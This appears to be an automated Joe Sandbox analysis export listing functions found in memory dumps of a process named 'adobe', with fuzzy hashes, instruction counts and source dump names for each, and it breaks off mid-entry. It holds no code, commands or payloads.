Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e30000_adobe.jbxd

Similarity

API ID:
String ID: PH^q
API String ID: 0-2549759414
Opcode ID: 7abd041a567c06ff16fe9d4b5120d9240efd0f3af6ccf126c05f19d0e8ce53c3
Instruction ID: 28a1a1f96e80e6b69f5533ab879f7f0fd2d40549a09e2f8e82279566a626e664
Opcode Fuzzy Hash: 7abd041a567c06ff16fe9d4b5120d9240efd0f3af6ccf126c05f19d0e8ce53c3
Instruction Fuzzy Hash: 3141CF70E103199FDB61DFA5C9986AEBBB2FF85304F204529D406EB244EB75D946CB80

Function 06E3DA3D Relevance: 1.4, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

PH^q, xrefs: 06E3DB99

Memory Dump Source

Source File: 0000000A.00000002.4117741284.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e30000_adobe.jbxd

Similarity

API ID:
String ID: PH^q
API String ID: 0-2549759414
Opcode ID: 40564b30b17efce2b779982bca5add07acf350d851c815ea6e3f8d651881ffb7
Instruction ID: 7717696a72be9e0d0b376879b824a45f33957987f24b4cd1fc06bead2edd1a13
Opcode Fuzzy Hash: 40564b30b17efce2b779982bca5add07acf350d851c815ea6e3f8d651881ffb7
Instruction Fuzzy Hash: E841C370E103699FDB61DF65C98869EBBB2FF85304F204529D405EB244EB75E846CB81

Function 06E321B5 Relevance: 1.4, Strings: 1, Instructions: 112COMMON

Download Yara Rule

Strings

PH^q, xrefs: 06E32303

Memory Dump Source

Source File: 0000000A.00000002.4117741284.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e30000_adobe.jbxd

Similarity

API ID:
String ID: PH^q
API String ID: 0-2549759414
Opcode ID: 4d79bd0cb53be47bc9ec45b247cd1d68c4bcf4e220b700f4bf65e803ccb2d7c7
Instruction ID: 61143d3fedc3b5f8289d8c3841a6d61fce854542468f8e8d6ae3bc1819285d9d
Opcode Fuzzy Hash: 4d79bd0cb53be47bc9ec45b247cd1d68c4bcf4e220b700f4bf65e803ccb2d7c7
Instruction Fuzzy Hash: 34313330B00315CFEB15AB70CA586AE7BE2AF89204F249578C146DB381DF39DD02CBA1

Function 06E321C8 Relevance: 1.4, Strings: 1, Instructions: 105COMMON

Download Yara Rule

Strings

PH^q, xrefs: 06E32303

Memory Dump Source

Source File: 0000000A.00000002.4117741284.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e30000_adobe.jbxd

Similarity

API ID:
String ID: PH^q
API String ID: 0-2549759414
Opcode ID: ecf18389f7c6c85bc4f8d480155ff257b48b011f3001a82647067eeba00fec5f
Instruction ID: 4c7abe95b1d0b795e365230d1ec6abeb4acaf56a02f6b801229cc9b3a110b2c0
Opcode Fuzzy Hash: ecf18389f7c6c85bc4f8d480155ff257b48b011f3001a82647067eeba00fec5f
Instruction Fuzzy Hash: 7C310430B003158FEB55AB74CA586AE7BE3ABC8204F209528D546DB384DF39DD45CBA1

Function 06E3FEE9 Relevance: 1.3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

Strings

|, xrefs: 06E3FF48

Memory Dump Source

Source File: 0000000A.00000002.4117741284.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e30000_adobe.jbxd

Similarity

API ID:
String ID: |
API String ID: 0-2343686810
Opcode ID: 9905842aa361adfe12c9009c447b68a56f4a456381d1fa5ccbef2864554d3a60
Instruction ID: 51a6a3c4b3474a0b16e3db0aa4146415a8a38abf7cb9d1a73598e6a7dad05526
Opcode Fuzzy Hash: 9905842aa361adfe12c9009c447b68a56f4a456381d1fa5ccbef2864554d3a60
Instruction Fuzzy Hash: 01115C70F102249FDB509B788805B6E7BF5AF4C714F108469E94AE7390EB759900CB85

Function 06E3FEF8 Relevance: 1.3, Strings: 1, Instructions: 59COMMON

Download Yara Rule

Strings

|, xrefs: 06E3FF48

Memory Dump Source

Source File: 0000000A.00000002.4117741284.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e30000_adobe.jbxd

Similarity

API ID:
String ID: |
API String ID: 0-2343686810
Opcode ID: 06dcf305d60c6466a33c353d44a157a68c27593efb1f119e2094a01bf52d77b9
Instruction ID: 163b02ad84017d1955ce4556a56730cf8c8d9e19f798caa9bf76d88ed4b09207
Opcode Fuzzy Hash: 06dcf305d60c6466a33c353d44a157a68c27593efb1f119e2094a01bf52d77b9
Instruction Fuzzy Hash: 5F114C74F102249FDB54DB798804B6E7BF5AF4C714F104469E94ADB3A0DB759900CB85

Function 06E3B1A4 Relevance: .3, Instructions: 290COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4117741284.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e30000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b031354b3b5da9d5f548d2634659dc72262d2055ccab6195ff698fcb1f0ea56
Instruction ID: 3ed5420dc60493f5c5f8d4663f8351c8288b701b8d443f51d6d5aae4d7655e63
Opcode Fuzzy Hash: 1b031354b3b5da9d5f548d2634659dc72262d2055ccab6195ff698fcb1f0ea56
Instruction Fuzzy Hash: D8A1B834F003199FEF64CBA8C5987AEB7B6EB99314F205925E406EB391CA35DC81C751

Function 06E36158 Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4117741284.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e30000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb42d48d238926630c1a111f2dbdf3704b792043f1eac3ea3c86f273477f5be4
Instruction ID: 15666e48036dec52d33759060cb3dc6c67f227e85a7b91c03cb16ce4d04a87af
Opcode Fuzzy Hash: fb42d48d238926630c1a111f2dbdf3704b792043f1eac3ea3c86f273477f5be4
Instruction Fuzzy Hash: 5861D171F001214FDF549A7EC88866FAADBAFC4224B15443AD80EDB361DEA6DD0287D2

Function 06E34251 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4117741284.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e30000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4f07d3ca07eaeae4e46f46180a8eb71a443394fa12f08cb664cf8f55a27a4ee
Instruction ID: fc0eeb638f46f6cd6142ed17d02ae437f7fd6f9c83026750b588d59a425e94f9
Opcode Fuzzy Hash: d4f07d3ca07eaeae4e46f46180a8eb71a443394fa12f08cb664cf8f55a27a4ee
Instruction Fuzzy Hash: F0815C35F002199FDB54DFA9C5586AEB7F2AF89304F209529D40AEB384EB34EC42CB51

Function 06E34260 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4117741284.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e30000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17b59e024408a0bfe6d85dae99d152e88aa4204582705fbce3e0b88d3bcfad8a
Instruction ID: 4ea4ed99140b17f9fb29a03d4c0606707579b35cc6d39c25ec72a3bec4a34c0a
Opcode Fuzzy Hash: 17b59e024408a0bfe6d85dae99d152e88aa4204582705fbce3e0b88d3bcfad8a
Instruction Fuzzy Hash: 33814C34F102199FDF54DFA9D5546AEB7F6AB89304F209429D40AEB384EB34EC42CB51

Function 06E3456C Relevance: .2, Instructions: 214COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4117741284.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e30000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f62ae401a1894bb9ebfbfb1820b5e7f3eb44654bec3dc22baf95aa1e20ad23e
Instruction ID: 31dd6cb1b00ebb9bb6991022d221d6dabfc4d849411d2bab85eebf2b7ed4d4e6
Opcode Fuzzy Hash: 3f62ae401a1894bb9ebfbfb1820b5e7f3eb44654bec3dc22baf95aa1e20ad23e
Instruction Fuzzy Hash: E5916E34E102198BDF50DF68C880B9DB7B1FF89304F208699D549AB295EB70AA85CF91

Function 06E3457C Relevance: .2, Instructions: 212COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4117741284.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e30000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11d4af58f4ed06bec17fb4b6490928038c077da7a760ba249496d2301166fb58
Instruction ID: 100c4316fb5ac6e1e3bc57e3a7287e7a19dac76c832336f8d7701c74a8cda44e
Opcode Fuzzy Hash: 11d4af58f4ed06bec17fb4b6490928038c077da7a760ba249496d2301166fb58
Instruction Fuzzy Hash: F6915D34E102198BDF60DF68C880B9DB7B1FF89304F208599D549AB395EB71AA85CF91

Function 06E34580 Relevance: .2, Instructions: 210COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4117741284.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e30000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3afcad58dbdd43e7756cd42f6d59d0283611f2f65ef45fb0b74ac16d6574285e
Instruction ID: 9b96f15423ddadbe262aa5de6f782ccd33dcbfd17571a87e1db64397ce51c23a
Opcode Fuzzy Hash: 3afcad58dbdd43e7756cd42f6d59d0283611f2f65ef45fb0b74ac16d6574285e
Instruction Fuzzy Hash: F8914E34E10619CBDF60DF68C880B9DB7B1FF89304F208599D549AB395EB70AA85CF91

Function 06E3EE98 Relevance: .2, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4117741284.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e30000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be5b86531c1bdde87e13a34392e0d57ab35ab2e2ea3da7d709498b7f2b7ad0bd
Instruction ID: 05e54d92e3fc7bd4fb596a7b083cdb1062b3aa0577b4145e89f0ce1ddbe9e88b
Opcode Fuzzy Hash: be5b86531c1bdde87e13a34392e0d57ab35ab2e2ea3da7d709498b7f2b7ad0bd
Instruction Fuzzy Hash: 26715974E012189FDB54DBA9D984AAEBBF6FF88304F24942AD005EB355DB30EC46CB40

Function 06E3EEA8 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4117741284.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e30000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad86499df24a53160200fadba3e9e9e2df6ba4fd28ad4fc3841d460a8b27db54
Instruction ID: ed6275451ac37ee3dde84626d584d86bf3e6aea864b7d405eed4473c8f93e18d
Opcode Fuzzy Hash: ad86499df24a53160200fadba3e9e9e2df6ba4fd28ad4fc3841d460a8b27db54
Instruction Fuzzy Hash: 33714A74E012199FDB54DBA9D984AAEBBF6FF88304F24946AD005EB355DB30EC46CB40

Function 06E3FB38 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4117741284.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e30000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f05f4a12f7d2101b1b77b6b3f9ec2c821ec053995746640a1cbd5535d81200cf
Instruction ID: 506ae31e8b894674866c7326d566f59cc6d98e9ca4f9ba5fd62c651b36e7194e
Opcode Fuzzy Hash: f05f4a12f7d2101b1b77b6b3f9ec2c821ec053995746640a1cbd5535d81200cf
Instruction Fuzzy Hash: 3B51E171E01219DFDF24EB78E49C6ADB7B2EF84319F20887AD00ADB250DB358845CB81

Function 06E3F8D9 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4117741284.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e30000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dac99ae9f90dcce6adbc4466f958c1e1f9329a4f1667913be5680a6d43065e53
Instruction ID: 9ce099e5822f4499367e10015ada71516c581b921201205a74b208528cbc9771
Opcode Fuzzy Hash: dac99ae9f90dcce6adbc4466f958c1e1f9329a4f1667913be5680a6d43065e53
Instruction Fuzzy Hash: EA51B470F10324EFEF745AADD95877F2A5EDB89314F20582AE00ADB3D5C929CC4583A2

Function 06E3F8E8 Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4117741284.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e30000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e533140b6db97046851a6b2552f5f1b0e36c9001b7362549880b97993776f751
Instruction ID: 72a74d078830ea7b335d615eded2ac435b96383c83fc5e659ab82a2c7c9e9be3
Opcode Fuzzy Hash: e533140b6db97046851a6b2552f5f1b0e36c9001b7362549880b97993776f751
Instruction Fuzzy Hash: E6518070F103249FEF649AADD95877F265EDB89314F20582AE00ADB3D5C929CC8583A2

Function 06E353D0 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4117741284.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e30000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35dccd8a548ec8cf1805125391397fe60011019e5c1a2334e3a7cae3e8a70d9a
Instruction ID: 358302a873dba26ab5c803fdba780ad1fcec11b622c0ecb9aca644c8c01e03af
Opcode Fuzzy Hash: 35dccd8a548ec8cf1805125391397fe60011019e5c1a2334e3a7cae3e8a70d9a
Instruction Fuzzy Hash: 71415971E007199BDF74CEA9D884AAFFBF2EB84214F20592AD156D7640D330E856CB90

Function 06E32078 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4117741284.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e30000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 109892b6befda5204873ae016ff47b9fe57fd611e83b6de9584ad9402af33aa4
Instruction ID: f4030b54906de599e20594e956268558d7dc712b3f2016aefb5d7f091a09d388
Opcode Fuzzy Hash: 109892b6befda5204873ae016ff47b9fe57fd611e83b6de9584ad9402af33aa4
Instruction Fuzzy Hash: 4C31C030E103199FCB58CFA5D9986AEBBB2FF89304F109519E955EB340DB71A94ACB40

Function 06E3D8F0 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4117741284.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e30000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79e0e6e1e4278fc82f05d49596b03a8058ed0601a89becd7334c0e2e2c234ff5
Instruction ID: 51a27659b1219141138dfd35d7508f1fc8a3b572422ab9a8c42fc04ea62b4ad2
Opcode Fuzzy Hash: 79e0e6e1e4278fc82f05d49596b03a8058ed0601a89becd7334c0e2e2c234ff5
Instruction Fuzzy Hash: 5F31E370E103199FDF25CFA5C99469EBBB2FF84304F108929E405AB340EBB0E946CB80

Function 06E32088 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4117741284.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e30000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af59757ae316cc20995a4d4523dfb84a5cc1a418c133fc16c435703567813b86
Instruction ID: 6105f175639f4dd06191f0034fbb073e8bb657c0d47360f59315a62233948bf2
Opcode Fuzzy Hash: af59757ae316cc20995a4d4523dfb84a5cc1a418c133fc16c435703567813b86
Instruction Fuzzy Hash: 68318F30E102199FCB59CF65D99869EBBB2FF89304F109929E945EB340DB31ED46CB50

Function 06E33E58 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4117741284.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e30000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c2a3b11a64a8cc27c99c8d205e082229e2ea4c391f3fdfd65d43ecc10853ac0
Instruction ID: 9332f289a08039d24568115e0307817a6691912465f805fdd523da9b390f997b
Opcode Fuzzy Hash: 7c2a3b11a64a8cc27c99c8d205e082229e2ea4c391f3fdfd65d43ecc10853ac0
Instruction Fuzzy Hash: DC217C75E003259FDB10CFA9E840AAEBBB5FB48714F108125E919E7380E735DC01CB91

Function 06E33E68 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4117741284.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e30000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3eedf8bbdc86f2bf3094d366c70b67b60b2d99fef6fad9ed7fd1b378576787c0
Instruction ID: 38ea86876a2ff44fd7712ad17bc52d3743c03c0de03e7ef85daf3ec6e83f3137
Opcode Fuzzy Hash: 3eedf8bbdc86f2bf3094d366c70b67b60b2d99fef6fad9ed7fd1b378576787c0
Instruction Fuzzy Hash: B8215A75E003259FEB50CF69E880AAEB7F5FB48714F209429E915E7240E735DD01CB91

Function 0301D030 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4105343307.000000000301D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0301D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_301d000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 581b07ae93a208f0a92c311bcdc71c96da29f0b747f01573f20f6c8bc6ea1023
Instruction ID: 378d5e9e3d7d42df2332324174751c1b7f7b1ca8bbb6887df2862c6ce91c1265
Opcode Fuzzy Hash: 581b07ae93a208f0a92c311bcdc71c96da29f0b747f01573f20f6c8bc6ea1023
Instruction Fuzzy Hash: BE212975504204DFCB15DF54D9C0B3AFBA5FB84314F24CAADD9094B256C336D457CA62

Function 0301D007 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4105343307.000000000301D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0301D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_301d000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 820d04a9d89753488621694e02129e72190818857c01dd2256ff685f5fa9d179
Instruction ID: 013ce42b57843bcdf4b7c3005c96ca4fb574d9309b0dd0121721cc241f230042
Opcode Fuzzy Hash: 820d04a9d89753488621694e02129e72190818857c01dd2256ff685f5fa9d179
Instruction Fuzzy Hash: 5D216D751093C09FCB03CF64D990711BFB5EB46214F29C5DBD8898F2A7C23A985ACB62

Function 06E3FB31 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4117741284.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e30000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1282c07078b5f89c335b2e3985013ce2aef17e046ad9fb9538a671e8eedbd0b
Instruction ID: d53cff2099975733f8bd7791d9f805a0401f77271811f08b09a1e0b6d09e2c3b
Opcode Fuzzy Hash: d1282c07078b5f89c335b2e3985013ce2aef17e046ad9fb9538a671e8eedbd0b
Instruction Fuzzy Hash: C711E971F112244BDFA89A79D46816EB6A7EBC4315F20947AD40ADB354EE35CC01C780

Function 06E33F78 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4117741284.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e30000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2501a887440d34267497dbabcef1f7efd53969b7d8d729f700b47e81dc99f7a8
Instruction ID: 20e6660aec7041fd992a1277857addd0e92035dd54686e41816f04750e95a90e
Opcode Fuzzy Hash: 2501a887440d34267497dbabcef1f7efd53969b7d8d729f700b47e81dc99f7a8
Instruction Fuzzy Hash: E3115235B101299FDB549A69D818AEE73EBEBC8215F104535D40AE7384EE659C028BD2

Function 06E3F118 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4117741284.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e30000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff9328838c6e5445b077ede6985d3139da3b98ff5c30b5ac9d8b27cd1f58880f
Instruction ID: ffffeb7154adbfc4abcbd6830bc0d47874c51bac6a3b5fa94fd6aabf595d248b
Opcode Fuzzy Hash: ff9328838c6e5445b077ede6985d3139da3b98ff5c30b5ac9d8b27cd1f58880f
Instruction Fuzzy Hash: E9012871F102240FDB61863DE85472A77E6DBCA318F109439E00DC7342DE61CC078381

Function 06E33C30 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4117741284.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e30000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2731382096cab40e797bdbc23d2947cc17d2250dc74b6e13a4aa08b2dc21f8f1
Instruction ID: 7e1893f0c8c1b3d0756d42e229d3515a9e200b69271407d98381dbfc64a838d8
Opcode Fuzzy Hash: 2731382096cab40e797bdbc23d2947cc17d2250dc74b6e13a4aa08b2dc21f8f1
Instruction Fuzzy Hash: D021C2B1D01269EFCB00CF9AD985ADEFBB4FB48314F10812AE918A7340D375A544CFA5

Function 06E341B1 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4117741284.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e30000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6993ea8b07f4319862503aaf915954e026e6f0a675e23c3e64fdd23d0bd6e6e6
Instruction ID: 75966cd3fc97d7c19c8e1f6ca385371043494e7940cbf85ec7298d55234f166c
Opcode Fuzzy Hash: 6993ea8b07f4319862503aaf915954e026e6f0a675e23c3e64fdd23d0bd6e6e6
Instruction Fuzzy Hash: BC01D435B106249BDBA49AAE995472BAADADBC9714F14943EE10AC7380ED21DC068391

Function 06E33F67 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4117741284.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e30000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b025d18ef6bf778a497ab23912d8a14d423bd409ba564b48080df8c3a117b545
Instruction ID: 31b724967f5272a1eacd20abaf9fb844d72b365620d37c8b10a6d853e86cc256
Opcode Fuzzy Hash: b025d18ef6bf778a497ab23912d8a14d423bd409ba564b48080df8c3a117b545
Instruction Fuzzy Hash: 5B01D432B102295FDB549AA8DC19BEF73FBDBC8215F140136D409E7380EE699C0287D2

Function 06E341BC Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4117741284.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e30000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d7ba345ed17c9d33130286a4eece26dd9bda211387f054d73556e9e2daf45f1
Instruction ID: ba40c55470b999a84a14630208ff2e3ccad3cfd9e41ba665935052c4ea145b1e
Opcode Fuzzy Hash: 9d7ba345ed17c9d33130286a4eece26dd9bda211387f054d73556e9e2daf45f1
Instruction Fuzzy Hash: CA01D635B106249FDB64DAAED55472BB7DADBC9718F10D43AE50ECB380DE22DC028395

Function 06E33C38 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4117741284.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e30000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: efff77192c65a8c21a0f45094a816e825861cad8fe37002d3cf13977d921e9a5
Instruction ID: 82624233c0def5d91b9ee254955eb0195ae73202e8a298c9e02ae9090f250109
Opcode Fuzzy Hash: efff77192c65a8c21a0f45094a816e825861cad8fe37002d3cf13977d921e9a5
Instruction Fuzzy Hash: AA11C2B1D01269EFCB00CF9AD884ACEFBB4FB48314F10812AE518A7240C374A544CFA5

Function 06E341C0 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4117741284.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e30000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 093d4a7390f09d17307c75ba452929ca3b0dbb18e0b0b5eed8d8e1e92d283573
Instruction ID: 0367f9317c3312e6bca1326c8f8a192039601e559e16fec9f7a7b169ef03ea70
Opcode Fuzzy Hash: 093d4a7390f09d17307c75ba452929ca3b0dbb18e0b0b5eed8d8e1e92d283573
Instruction Fuzzy Hash: E601D635B101245BDB64D9AED55472BB6DADBC9718F10D43AE50EC7380DD21DC028395

Function 06E3F128 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4117741284.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e30000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b00236d14c7a89ad496f9c2a9e97fc4f889ffac27c308ece6f7f53c457fe77b3
Instruction ID: 14beea6992e8090b074f68308fa9b9b2e635f79e16211d23a02d1c44cab6a5c3
Opcode Fuzzy Hash: b00236d14c7a89ad496f9c2a9e97fc4f889ffac27c308ece6f7f53c457fe77b3
Instruction Fuzzy Hash: ED01D171F101241BDB64956EE85872E67DADBC9628F109439E00ECB341DE61DC078385

Function 06E3A27A Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4117741284.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e30000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fc766dfca6fb1752fd47bfd1bf3b0bd5b5154b536c53fb6cdcec9133ee6d966
Instruction ID: d289c5b2e7e0db1401a6f80656ca31724f2e22ad63598f2569f9a40ba732ce17
Opcode Fuzzy Hash: 3fc766dfca6fb1752fd47bfd1bf3b0bd5b5154b536c53fb6cdcec9133ee6d966
Instruction Fuzzy Hash: 8501A735B102140FE790D7BED55876E77D5EB89718F109939E48AD7380DD26DC418781

Function 06E3A284 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

